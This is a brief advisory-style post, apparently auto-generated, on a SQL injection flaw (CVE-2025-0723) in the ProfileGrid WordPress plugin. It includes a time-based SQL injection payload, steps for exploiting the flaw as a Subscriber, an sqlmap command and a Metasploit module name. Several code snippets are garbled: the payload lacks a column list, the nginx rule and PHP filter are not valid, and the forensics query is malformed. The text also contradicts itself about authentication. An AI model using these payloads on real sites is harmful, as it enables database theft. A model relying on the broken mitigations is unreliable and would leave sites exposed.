How the CVE Works:
The ProfileGrid plugin (≤ v5.9.4.7) for WordPress fails to sanitize user-supplied input in the `rid` and `search` parameters, enabling blind/time-based SQL injection. Attackers with Subscriber-level access can manipulate these parameters to inject malicious SQL payloads. The lack of prepared statements allows appended queries to bypass authentication, exfiltrating database contents (e.g., user credentials, sensitive settings). The vulnerability stems from direct concatenation of unsanitized input into SQL queries.
DailyCVE Form:
Platform: WordPress
Version: ≤5.9.4.7
Vulnerability: SQL Injection
Severity: Critical
Date: 03/26/2025
What Undercode Say:
Exploitation:
1. Payload Example:
GET /wp-content/plugins/profilegrid/?rid=1%20AND%20(SELECT%20%20FROM%20(SELECT(SLEEP(5)))--
2. Exploit Steps:
- Authenticate as Subscriber.
- Intercept requests containing
rid/search. - Inject time-delay or boolean-based payloads.
Detection:
curl -I "http://target/wp-content/plugins/profilegrid/?rid=1%20AND%201=1"
Mitigation:
1. Patch: Upgrade to ProfileGrid >5.9.4.7.
2. WAF Rules:
location ~ /profilegrid/ {
deny ~ (sleep|benchmark|union|select);
}
3. PHP Hardening:
add_filter('query_vars', function($vars) {
return array_diff($vars, [bash]);
});
Forensics:
-- Check WordPress logs for suspicious queries: SELECT FROM wp_logs WHERE request LIKE '%profilegrid%rid=%';
Tooling:
- SQLmap Command:
sqlmap -u "http://target/?rid=1" --level=3 --risk=3
- Metasploit Module:
use auxiliary/scanner/http/wp_profilegrid_sqli
References:
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-0723
Extra Source Hub:
Undercode
